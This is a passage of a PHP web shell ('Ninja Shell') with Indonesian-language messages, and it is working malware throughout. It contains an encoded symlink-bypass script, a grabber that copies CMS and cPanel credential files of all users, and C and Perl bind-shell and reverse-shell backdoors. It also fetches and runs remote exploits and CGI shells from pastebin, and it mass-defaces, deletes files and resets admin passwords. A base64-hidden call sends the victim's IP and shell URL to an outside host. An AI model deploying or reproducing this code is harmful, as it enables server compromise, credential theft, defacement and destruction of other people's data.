"Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCnByaW50ICJcbiINCnByaW50ICJ+Iio2MA0KcHJpbnQgIlN5bWxpbmsgQnlwYXNzIDIwMTQgYnkgTWluZGxlc3MgSW5qZWN0b3IgIg0KcHJpbnQgIiAgICAgICAgICAgICAgU3BlY2lhbCBHcmVldHogdG8gOiBQYWsgQ3liZXIgU2t1bGx6Ig0KcHJpbnQgIn4iKjYwDQoNCm9zLm1ha2VkaXJzKCdicnVkdWxzeW1weScpDQpvcy5jaGRpcignYnJ1ZHVsc3ltcHknKQ0KDQpzdXNyPVtdDQpzaXRleD1bXQ0Kb3Muc3lzdGVtKCJsbiAtcyAvIGJydWR1bC50eHQiKQ0KDQpoID0gIk9wdGlvbnMgSW5kZXhlcyBGb2xsb3dTeW1MaW5rc1xuRGlyZWN0b3J5SW5kZXggYnJ1ZHVsLnBodG1sXG5BZGRUeXBlIHR4dCAucGhwXG5BZGRIYW5kbGVyIHR4dCAucGhwIg0KbSA9IG9wZW4oIi5odGFjY2VzcyIsIncrIikNCm0ud3JpdGUoaCkNCm0uY2xvc2UoKQ0KcHJpbnQgaHRhDQoNCnNmID0gIjxodG1sPjx0aXRsZT5TeW1saW5rIFB5dGhvbjwvdGl0bGU+PGNlbnRlcj48Zm9udCBjb2xvcj13aGl0ZSBzaXplPTU+U3ltbGluayBCeXBhc3MgMjAxNzxicj48Zm9udCBzaXplPTQ+TWFkZSBCeSBNaW5kbGVzcyBJbmplY3RvciA8YnI+UmVjb2RlZCBCeSBDb243ZXh0PC9mb250PjwvZm9udD48YnI+PGZvbnQgY29sb3I9d2hpdGUgc2l6ZT0zPjx0YWJsZT4iDQoNCm8gPSBvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKQ0Kbz1vLnJlYWQoKQ0KbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykNCg0KZm9yIHh1c3IgaW4gbzoNCgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykNCglzdXNyLmFwcGVuZCh4dXNyKQ0KcHJpbnQgIi0iKjMwDQp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQ0KDQpmb3IgeHhzaXRlIGluIHhzaXRlOg0KCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikNCglzaXRleC5hcHBlbmQoeHhzaXRlKQ0KcHJpbnQgZg0KcGF0aD1vcy5nZXRjd2QoKQ0KaWYgIi9wdWJsaWNfaHRtbC8iIGluIHBhdGg6DQoJcGF0aD0iL3B1YmxpY19odG1sLyINCmVsc2U6DQoJcGF0aCA9ICIvaHRtbC8iDQpjb3VudGVyPTENCmlwcz1vcGVuKCJicnVkdWwucGh0bWwiLCJ3IikNCmlwcy53cml0ZShzZikNCg0KZm9yIGZ1c3IgaW4gc3VzcjoNCglmb3IgZnNpdGUgaW4gc2l0ZXg6DQoJCWZ1PWZ1c3JbMDo1XQ0KCQlzPWZzaXRlWzA6NV0NCgkJaWYgZnU9PXM6DQoJCQlpcHMud3JpdGUoIjxib2R5IGJnY29sb3I9YmxhY2s+PHRyPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6d2hpdGU7PiVzPC90ZD48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOnJlZDs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7PjxhIGhyZWY9YnJ1ZHVsLnR4dC9ob21lLyVzJXMgdGFyZ2V0PV9ibGFuayA+JXM8L2E+PC90ZD4iJShjb3VudGVyLGZ1c3IsZnVzcixwYXRoLGZzaXRlKSkNCgkJCWNvdW50ZXI9Y291bnRlcisx"; $sym = fopen($file_sym, "w"); fwrite($sym, base64_decode($sym_script)); chmod($file_sym, 493); $jancok = exe("python sym.py"); echo "<br><center>Done ... <a href='ia_sympy/brudulsympy/' target='_blank'>Klik Here</a>"; } } elseif (isset($_GET[hex("config")])) { $dir = path(); if ($_POST) { $passwd = $_POST["passwd"]; mkdir("Exc_config", 511); $isi_htc = "Options all
Require None
Satisfy Any"; $htc = fopen("Exc_config/.htaccess", "w"); fwrite($htc, $isi_htc); preg_match_all("/(.*?):x:/", $passwd, $user_config); foreach ($user_config[1] as $user_Exc) { $user_config_dir = "/home/{$user_Exc}/public_html/"; if (is_readable($user_config_dir)) { $grab_config = array("/home/{$user_Exc}/.my.cnf" => "cpanel", "/home/{$user_Exc}/.accesshash" => "WHM-accesshash", "/home/{$user_Exc}/public_html/bw-configs/config.ini" => "BosWeb", "/home/{$user_Exc}/public_html/config/koneksi.php" => "Lokomedia", "/home/{$user_Exc}/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/{$user_Exc}/public_html/clientarea/configuration.php" => "WHMCS", "/home/{$user_Exc}/public_html/whm/configuration.php" => "WHMCS", "/home/{$user_Exc}/public_html/whmcs/configuration.php" => "WHMCS", "/home/{$user_Exc}/public_html/forum/config.php" => "phpBB", "/home/{$user_Exc}/public_html/sites/default/settings.php" => "Drupal", "/home/{$user_Exc}/public_html/config/settings.inc.php" => "PrestaShop", "/home/{$user_Exc}/public_html/app/etc/local.xml" => "Magento", "/home/{$user_Exc}/public_html/joomla/configuration.php" => "Joomla", "/home/{$user_Exc}/public_html/configuration.php" => "Joomla", "/home/{$user_Exc}/public_html/wp/wp-config.php" => "WordPress", "/home/{$user_Exc}/public_html/wordpress/wp-config.php" => "WordPress", "/home/{$user_Exc}/public_html/wp-config.php" => "WordPress", "/home/{$user_Exc}/public_html/admin/config.php" => "OpenCart", "/home/{$user_Exc}/public_html/slconfig.php" => "Sitelok", "/home/{$user_Exc}/public_html/application/config/database.php" => "Ellislab", "/home1/{$user_Exc}/.my.cnf" => "cpanel", "/home1/{$user_Exc}/.accesshash" => "WHM-accesshash", "/home1/{$user_Exc}/public_html/bw-configs/config.ini" => "BosWeb", "/home1/{$user_Exc}/public_html/config/koneksi.php" => "Lokomedia", "/home1/{$user_Exc}/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home1/{$user_Exc}/public_html/clientarea/configuration.php" => "WHMCS", "/home1/{$user_Exc}/public_html/whm/configuration.php" => "WHMCS", "/home1/{$user_Exc}/public_html/whmcs/configuration.php" => "WHMCS", "/home1/{$user_Exc}/public_html/forum/config.php" => "phpBB", "/home1/{$user_Exc}/public_html/sites/default/settings.php" => "Drupal", "/home1/{$user_Exc}/public_html/config/settings.inc.php" => "PrestaShop", "/home1/{$user_Exc}/public_html/app/etc/local.xml" => "Magento", "/home1/{$user_Exc}/public_html/joomla/configuration.php" => "Joomla", "/home1/{$user_Exc}/public_html/configuration.php" => "Joomla", "/home1/{$user_Exc}/public_html/wp/wp-config.php" => "WordPress", "/home1/{$user_Exc}/public_html/wordpress/wp-config.php" => "WordPress", "/home1/{$user_Exc}/public_html/wp-config.php" => "WordPress", "/home1/{$user_Exc}/public_html/admin/config.php" => "OpenCart", "/home1/{$user_Exc}/public_html/slconfig.php" => "Sitelok", "/home1/{$user_Exc}/public_html/application/config/database.php" => "Ellislab", "/home2/{$user_Exc}/.my.cnf" => "cpanel", "/home2/{$user_Exc}/.accesshash" => "WHM-accesshash", "/home2/{$user_Exc}/public_html/bw-configs/config.ini" => "BosWeb", "/home2/{$user_Exc}/public_html/config/koneksi.php" => "Lokomedia", "/home2/{$user_Exc}/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home2/{$user_Exc}/public_html/clientarea/configuration.php" => "WHMCS", "/home2/{$user_Exc}/public_html/whm/configuration.php" => "WHMCS", "/home2/{$user_Exc}/public_html/whmcs/configuration.php" => "WHMCS", "/home2/{$user_Exc}/public_html/forum/config.php" => "phpBB", "/home2/{$user_Exc}/public_html/sites/default/settings.php" => "Drupal", "/home2/{$user_Exc}/public_html/config/settings.inc.php" => "PrestaShop", "/home2/{$user_Exc}/public_html/app/etc/local.xml" => "Magento", "/home2/{$user_Exc}/public_html/joomla/configuration.php" => "Joomla", "/home2/{$user_Exc}/public_html/configuration.php" => "Joomla", "/home2/{$user_Exc}/public_html/wp/wp-config.php" => "WordPress", "/home2/{$user_Exc}/public_html/wordpress/wp-config.php" => "WordPress", "/home2/{$user_Exc}/public_html/wp-config.php" => "WordPress", "/home2/{$user_Exc}/public_html/admin/config.php" => "OpenCart", "/home2/{$user_Exc}/public_html/slconfig.php" => "Sitelok", "/home2/{$user_Exc}/public_html/application/config/database.php" => "Ellislab", "/home3/{$user_Exc}/.my.cnf" => "cpanel", "/home3/{$user_Exc}/.accesshash" => "WHM-accesshash", "/home3/{$user_Exc}/public_html/bw-configs/config.ini" => "BosWeb", "/home3/{$user_Exc}/public_html/config/koneksi.php" => "Lokomedia", "/home3/{$user_Exc}/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home3/{$user_Exc}/public_html/clientarea/configuration.php" => "WHMCS", "/home3/{$user_Exc}/public_html/whm/configuration.php" => "WHMCS", "/home3/{$user_Exc}/public_html/whmcs/configuration.php" => "WHMCS", "/home3/{$user_Exc}/public_html/forum/config.php" => "phpBB", "/home3/{$user_Exc}/public_html/sites/default/settings.php" => "Drupal", "/home3/{$user_Exc}/public_html/config/settings.inc.php" => "PrestaShop", "/home3/{$user_Exc}/public_html/app/etc/local.xml" => "Magento", "/home3/{$user_Exc}/public_html/joomla/configuration.php" => "Joomla", "/home3/{$user_Exc}/public_html/configuration.php" => "Joomla", "/home3/{$user_Exc}/public_html/wp/wp-config.php" => "WordPress", "/home3/{$user_Exc}/public_html/wordpress/wp-config.php" => "WordPress", "/home3/{$user_Exc}/public_html/wp-config.php" => "WordPress", "/home3/{$user_Exc}/public_html/admin/config.php" => "OpenCart", "/home3/{$user_Exc}/public_html/slconfig.php" => "Sitelok", "/home3/{$user_Exc}/public_html/application/config/database.php" => "Ellislab"); foreach ($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if ($ambil_config == '') { } else { $file_config = fopen("Exc_config/{$user_Exc}-{$nama_config}.txt", "w"); fputs($file_config, $ambil_config); } } } } echo "<center><a class = 'ajx' href='?dir={$dir}/Exc_config'><font color=lime>Done</font></a></center>"; } else { $baru = hex($dir); $baru2 = hex("bypass-passwd"); echo "<hr><br><center>"; echo "<h2>Config Grabber Ninja Shell</h2>"; echo "<form method="post" action=""><center>etc/passwd ( Error ? <a class = 'ajx' href='?d={$baru}&{$baru2}'>Bypass Here</a> )<br><textarea name="passwd" class='area form-control' rows='15' cols='60'>\xa"; echo file_get_contents("/etc/passwd"); echo "</textarea><br><input type="submit" value="Grab" class = 'form-control' style='width:250px;'></td></tr></center>
"; echo "<br><hr>"; } } elseif (isset($_GET[hex("network")])) { $dir = path(); if (isset($_POST["bind"]) && !empty($_POST["port"]) && !empty($_POST["bind_pass"]) && $_POST["use"] == "C") { $port = trim($_POST["port"]); $passwrd = trim($_POST["bind_pass"]); tulis("bdc.c", $port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc " . $port . " " . $passwrd . " &"); $scan = exe("ps aux"); if (eregi("./bdc {$por}", $scan)) { $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST["bind"]) && !empty($_POST["port"]) && !empty($_POST["bind_pass"]) && $_POST["use"] == "Perl") { $port = trim($_POST["port"]); $passwrd = trim($_POST["bind_pass"]); tulis("bdp", $port_bind_bd_pl); exe("chmod 777 bdp"); $p2 = which("perl"); exe($p2 . " bdp " . $port . " &"); $scan = exe("ps aux"); if (eregi("{$p2} bdp {$port}", $scan)) { $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST["backconn"]) && !empty($_POST["backport"]) && !empty($_POST["ip"]) && $_POST["use"] == "C") { $ip = trim($_POST["ip"]); $port = trim($_POST["backport"]); tulis("bcc.c", $back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc " . $ip . " " . $port . " &"); $msg = "Now script try connect to " . $ip . " port " . $port . " ..."; } elseif (isset($_POST["backconn"]) && !empty($_POST["backport"]) && !empty($_POST["ip"]) && $_POST["use"] == "Perl") { $ip = trim($_POST["ip"]); $port = trim($_POST["backport"]); tulis("bcp", $back_connect); exe("chmod +x bcp"); $p2 = which("perl"); exe($p2 . " bcp " . $ip . " " . $port . " &"); $msg = "Now script try connect to " . $ip . " port " . $port . " ..."; } elseif (isset($_POST["expcompile"]) && !empty($_POST["wurl"]) && !empty($_POST["wcmd"])) { $pilihan = trim($_POST["pilihan"]); $wurl = trim($_POST["wurl"]); $namafile = download($pilihan, $wurl); if (is_file($namafile)) { $msg = exe($wcmd); } else { $msg = "error: file not found {$namafile}"; } } ?>
<hr><br>
<center>
<h2>Netsploit Ninja Shell</h2>
<table class="tabnet">
<tr>
<th>Port Binding</th>
<th>Connect Back</th>
<th>Load and Exploit</th>
</tr>
<tr>
<td>
<table>
<form method="post">
<tr>
<td>Port <br><br><br>Pass<br><br><br><br><br></td>
<td><input class="form-control" type="text" name="port" size="26" value="<?php echo $bindport; ?>
"><br><br><input class="form-control" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>
"><br><select class="form-control" size="1" name="use">
<option value="Perl">Perl</option>
<option value="C">C</option>
</select><br><input class="form-control" type="submit" name="bind" value="Bind" style="width:80px"></td>
</tr>
</form>
</table>
</td>
<td>
<table>
<form method="post">
<tr>
<td>IP<br><br><br>Port<br><br><br><br><br></td>
<td><input class="form-control" type="text" name="ip" size="26" value="<?php echo getenv("REMOTE_ADDR") ? getenv("REMOTE_ADDR") : "127.0.0.1"; ?>
"><br><br><input class="form-control" type="text" name="backport" size="26" value="<?php echo $bindport; ?>
"><br><select size="1" class="form-control" name="use">
<option value="Perl">Perl</option>
<option value="C">C</option>
</select><br><input type="submit" name="backconn" value="Connect" class="form-control" style="width:100px"></td>
</tr>
</form>
</table>
</td>
<td>
<table>
<form method="post">
<tr>
<td>url<br><br><br>cmd<br><br><br><br><br></td>
<td><input class="form-control" type="text" name="wurl" style="width:220px;" value="www.some-code/exploits.c"><br><br><input class="form-control" type="text" name="wcmd" style="width:220px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"><br><select size="1" class="form-control" name="pilihan">
<option value="wwget">wget</option>
<option value="wlynx">lynx</option>
<option value="wfread">fread</option>
<option value="wfetch">fetch</option>
<option value="wlinks">links</option>
<option value="wget">GET</option>
<option value="wcurl">curl</option>
</select><br><input type="submit" name="expcompile" class="form-control" value="Go" style="width:80px;"></td>
</tr>
</form>
</table>
</td>
</tr>
</table>
</center>
<hr><br>
<div style="text-align:center;margin:2px;"><?php echo $msg; ?>
</div><?php function GetIP() { if (getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP"); } elseif (getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR"); if (strstr($ip, ",")) { $tmp = explode(",", $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("REMOTE_ADDR"); } return $ip; } $x = base64_decode("aHR0cHM6Ly9hbm9ueW0wdXMuY2x1Yi9sLQ==") . GetIP() . "-" . base64_encode("http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]); if (function_exists("curl_init")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("file_get_contents")) { @($gitt = file_get_contents($x)); } ?>
<?php } elseif (isset($_GET[hex("cgi")])) { echo "<hr><br>"; echo "<center>
\x9\x9 <h2> CGI Ninja Shell </h2> <br><br>
\x9\x9 \x9<form method = 'POST'>
\x9 \x9 <div class = 'row clearfix'>\xa\x9 \x9\x9\x9 <div class = 'col-md-4'>\xa\x9 \x9 <input type = 'submit' name = 'cgi' class = 'form-control' value = 'CGI Perl' style='width: 250px;' height='10'>
\x9 \x9 \x9</div>\xa \x9\x9\x9 \x9<div class = 'col-md-4'>\xa \x9\x9\x9\x9 <input type = 'submit' name = 'cgi2' class = 'form-control' value = 'CGI Perl 2' style='width: 250px;' height='10'>
\x9\x9 \x9\x9</div>
\x9 \x9 \x9<div class = 'col-md-4'>\xa\x9\x9\x9\x9\x9 <input type = 'submit' name = 'cgipy' class = 'form-control' value = 'CGI Python' style='width: 250px;' height='10'>
\x9\x9 </div>
\x9\x9\x9\x9
\x9 </div></form></center><hr><br>"; if (isset($_POST["cgi"])) { $cgi_dir = mkdir("ia_cgi", 493); chdir("ia_cgi"); $file_cgi = "cgi.Index_Attacker"; $memeg = ".htaccess"; $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddType application/x-httpd-cgi .Index_Attacker
AddHandler cgi-script .Index_Attacker
AddHandler cgi-script .Index_Attacker"; $htcgi = fopen(".htaccess", "w"); $ch = curl_init("https://pastebin.com/raw/Lj46KxFT"); $cgi = fopen($file_cgi, "w"); curl_setopt($ch, CURLOPT_FILE, $cgi); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 493); chmod($memeg, 493); fclose($cgi); ob_flush(); flush(); echo "<br><center>Done ... <a href='{$server}/ia_cgi/cgi.Index_Attacker' target='_blank'>Klik Here</a>"; } elseif (isset($_POST["cgi2"])) { $cgi_dir = mkdir("ia_cgi", 493); chdir("ia_cgi"); $file_cgi = "cgi2.Index_Attacker"; $memeg = ".htaccess"; $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddType application/x-httpd-cgi .Index_Attacker
AddHandler cgi-script .Index_Attacker "; $htcgi = fopen(".htaccess", "w"); $ch = curl_init("https://pastebin.com/raw/ZPZMC6K4"); $cgi = fopen($file_cgi, "w"); curl_setopt($ch, CURLOPT_FILE, $cgi); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 493); chmod($memeg, 493); echo "<br><center>Done ... <a href='ia_cgi/cgi2.Index_Attacker' target='_blank'>Klik Here</a>"; } elseif (isset($_POST["cgipy"])) { $cgi_dir = mkdir("ia_cgi", 493); chdir("ia_cgi"); $file_cgi = "cgipy.Index_Attacker"; $memeg = ".htaccess"; $isi_htcgi = "OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddType application/x-httpd-cgi .Index_Attacker
AddHandler cgi-script .Index_Attacker \xa AddHandler cgi-script .Index_Attacker"; $htcgi = fopen(".htaccess", "w"); $ch = curl_init("https://pastebin.com/raw/MYyXAXyY"); $cgi = fopen($file_cgi, "w"); curl_setopt($ch, CURLOPT_FILE, $cgi); curl_setopt($ch, CURLOPT_HEADER, 0); curl_exec($ch); curl_close($ch); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 493); chmod($memeg, 493); echo "<br><center>Done ... <a href='ia_cgi/cgipy.Index_Attacker' target='_blank'>Klik Here</a>"; } } elseif (isset($_GET[hex("mass_tool")])) { $dir = path(); echo "<center><form action="" method="post">
"; $dirr = $_POST["d_dir"]; $index = $_POST["script"]; $index = str_replace(""", "'", $index); $index = stripslashes($index); function edit_file($file, $index) { if (is_writable($file)) { clear_fill($file, $index); echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>"; } else { echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>"; } } function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { if (file_exists("{$dir}/{$namafile}")) { unlink("{$dir}/{$namafile}"); } } elseif ($dirb === "..") { if (file_exists('' . dirname($dir) . "/{$namafile}")) { unlink('' . dirname($dir) . "/{$namafile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if (file_exists($lokasi)) { echo "DELETED {$lokasi}<br>"; unlink($lokasi); $idx = hapus_massal($dirc, $namafile); } } } } } } } function clear_fill($file, $index) { if (file_exists($file)) { $handle = fopen($file, "w"); fwrite($handle, ''); fwrite($handle, $index); fclose($handle); } } function gass() { global $dirr, $index; chdir($dirr); $me = str_replace(dirname(__FILE__) . "/", '', __FILE__); $files = scandir($dirr); $notallow = array(".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "..", "."); sort($files); $n = 0; foreach ($files as $file) { if ($file != $me && is_dir($file) != 1 && !in_array($file, $notallow)) { echo "<center><Span style='color: #8A8A8A;'><strong>{$dirr}/</span>{$file}</strong> ====> "; edit_file($file, $index); flush(); $n = $n + 1; } } echo "<br>"; echo "<center><br><h3>{$n} Kali Anda Telah Ngecrot Disini </h3></center><br>"; } function ListFiles($dirrall) { if ($dh = opendir($dirrall)) { $files = array(); $inner_files = array(); $me = str_replace(dirname(__FILE__) . "/", '', __FILE__); $notallow = array($me, ".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "Thumbs.db"); while ($file = readdir($dh)) { if ($file != "." && $file != ".." && $file[0] != "." && !in_array($file, $notallow)) { if (is_dir($dirrall . "/" . $file)) { $inner_files = ListFiles($dirrall . "/" . $file); if (is_array($inner_files)) { $files = array_merge($files, $inner_files); } } else { array_push($files, $dirrall . "/" . $file); } } } closedir($dh); return $files; } } function gass_all() { global $index; $dirrall = $_POST["d_dir"]; foreach (ListFiles($dirrall) as $key => $file) { $file = str_replace("//", "/", $file); echo "<center><strong>{$file}</strong> ===>"; edit_file($file, $index); flush(); } $key = $key + 1; echo "<center><br><h3>{$key} Kali Anda Telah Ngecrot Disini </h3></center><br>"; } function sabun_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $lokasi = $dirc . "/" . $namafile; if ($dirb === ".") { file_put_contents($lokasi, $isi_script); } elseif ($dirb === "..") { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "[<font color=lime>DONE</font>] {$lokasi}<br>"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc, $namafile, $isi_script); } } } } } } if ($_POST["mass"] == "onedir") { echo "<br> Versi Text Area<br><textarea class = 'form-control' name='index' rows='10' cols='67'>
"; $ini = "http://"; $mainpath = $_POST[d_dir]; $file = $_POST[d_file]; $dir = opendir("{$mainpath}"); $code = base64_encode($_POST[script]); $indx = base64_decode($code); while ($row = readdir($dir)) { $start = @fopen("{$row}/{$file}", "w+"); $finish = @fwrite($start, $indx); if ($finish) { echo "{$ini}{$row}/{$file}
"; } } echo "</textarea><br><b>Versi Text</b><br><br><br>\xa"; $mainpath = $_POST[d_dir]; $file = $_POST[d_file]; $dir = opendir("{$mainpath}"); $code = base64_encode($_POST[script]); $indx = base64_decode($code); while ($row = readdir($dir)) { $start = @fopen("{$row}/{$file}", "w+"); $finish = @fwrite($start, $indx); if ($finish) { echo "<a href="http://" . $row . "/" . $file . "" target="_blank">http://" . $row . "/" . $file . "</a><br>"; } } echo "<hr>"; } elseif ($_POST["mass"] == "sabunkabeh") { gass(); } elseif ($_POST["mass"] == "hapusmassal") { hapus_massal($_POST["d_dir"], $_POST["d_file"]); } elseif ($_POST["mass"] == "sabunmematikan") { gass_all(); } elseif ($_POST["mass"] == "massdeface") { echo "<div style='margin: 5px auto; padding: 5px'>"; sabun_massal($_POST["d_dir"], $_POST["d_file"], $_POST["script"]); echo "</div>"; } else { echo "\xa\x9 <hr><br>\xa\x9 <center><h2>Mass Deface / Delete Files Ninja Shell</h2><font style='text-decoration: underline;'>\xa\x9 Select Type:<br>\xa\x9 </font>\xa \x9<select class="form-control" name="mass" style="width: 450px;" height="10">
\x9 <option value="onedir">Mass Deface 1 Dir</option>
<option value="massdeface">Mass Deface ALL Dir</option>
<option value="sabunkabeh">Sabun Massal Di Tempat</option>\xa\x9\x9<option value="sabunmematikan">Sabun Massal Bunuh Diri</option>
\x9 <option value="hapusmassal">Mass Delete Files</option></center></select><br>
\x9<font style='text-decoration: underline;'>Folder:</font><br>
\x9 <input class= 'form-control' type='text' name='d_dir' value='{$dir}' style='width: 450px;' height='10'><br>
<font style='text-decoration: underline;'>Filename:</font><br>
<input class= 'form-control' type='text' name='d_file' value='Exc.php' style='width: 450px;' height='10'><br>
\x9 <font style='text-decoration: underline;'>Index File:</font><br>
\x9\x9<textarea class= 'form-control' name='script' style='width: 450px; height: 200px;'>Hacked By ./Exorcism1337</textarea><br>
\x9<input class= 'form-control' type='submit' name='start' value='Mass Deface' style='width: 450px;'>\xa\x9\x9</form></center><hr><br>"; } } elseif (isset($_GET[hex("mass_user")])) { if ($_POST["hajar"]) { if (strlen($_POST["pass_baru"]) < 6 or strlen($_POST["user_baru"]) < 6) { print "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST["user_baru"]; $pass_baru = md5($_POST["pass_baru"]); $conf = $_POST["config_dir"]; if (preg_match("/^http:\/\//", $conf) or preg_match("/^https:\/\//", $conf)) { $get = curl($conf); preg_match_all("/<a href="(.*?).txt">/", $get, $link); foreach ($link[1] as $link_config) { $scan_conf[] = "{$link_config}.txt"; } } else { $scan_conf = scandir($conf); } foreach ($scan_conf as $file_conf) { $config = file_get_contents("{$conf}/{$file_conf}"); if (preg_match("/JConfig|joomla/", $config)) { $dbhost = getValue($config, "host = '", "'"); $dbuser = getValue($config, "user = '", "'"); $dbpass = getValue($config, "password = '", "'"); $dbname = getValue($config, "db = '", "'"); $dbprefix = getValue($config, "dbprefix = '", "'"); $prefix = $dbprefix . "users"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result["id"]; $site = getValue($config, "sitename = '", "'"); $update = mysql_query("UPDATE {$prefix} SET username='{$user_baru}',password='{$pass_baru}' WHERE id='{$id}'"); print "Config => " . $file_conf . "<br>"; print "CMS => Joomla<br>"; if ($site == '') { print "Sitename => " . color(1, 1, "Can't get domain name") . "<br>"; } else { print "Sitename => {$site}<br>"; } if (!$update or !$conn or !$db) { print "Status => " . color(1, 1, mysql_error()) . "<br><br>"; } else { print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "<br><br>"; } mysql_close($conn); } elseif (preg_match("/WordPress/", $config)) { $dbhost = getValue($config, "DB_HOST', '", "'"); $dbuser = getValue($config, "DB_USER', '", "'"); $dbpass = getValue($config, "DB_PASSWORD', '", "'"); $dbname = getValue($config, "DB_NAME', '", "'"); $dbprefix = getValue($config, "table_prefix = '", "'"); $prefix = $dbprefix . "users"; $option = $dbprefix . "options"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM {$option} ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if ($target == '') { $url_target = "Login => " . color(1, 1, "Cant't get domain name") . "<br>"; } else { $url_target = "Login => <a href='{$target}/wp-login.php' target='_blank'><u>{$target}/wp-login.php</u></a><br>"; } $update = mysql_query("UPDATE {$prefix} SET user_login='{$user_baru}',user_pass='{$pass_baru}' WHERE id='{$id}'"); print "Config => " . $file_conf . "<br>"; print "CMS => Wordpress<br>"; print $url_target; if (!$update or !$conn or !$db) { print "Status => " . color(1, 1, mysql_error()) . "<br><br>"; } else { print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "<br><br>"; } mysql_close($conn); } elseif (preg_match("/Magento|Mage_Core/", $config)) { $dbhost = getValue($config, "<host><![CDATA[", "]]></host>"); $dbuser = getValue($config, "<username><![CDATA[", "]]></username>"); $dbpass = getValue($config, "<password><![CDATA[", "]]></password>"); $dbname = getValue($config, "<dbname><![CDATA[", "]]></dbname>"); $dbprefix = getValue($config, "<table_prefix><![CDATA[", "]]></table_prefix>"); $prefix = $dbprefix . "admin_user"; $option = $dbprefix . "core_config_data"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM {$prefix} ORDER BY user_id ASC"); $result = 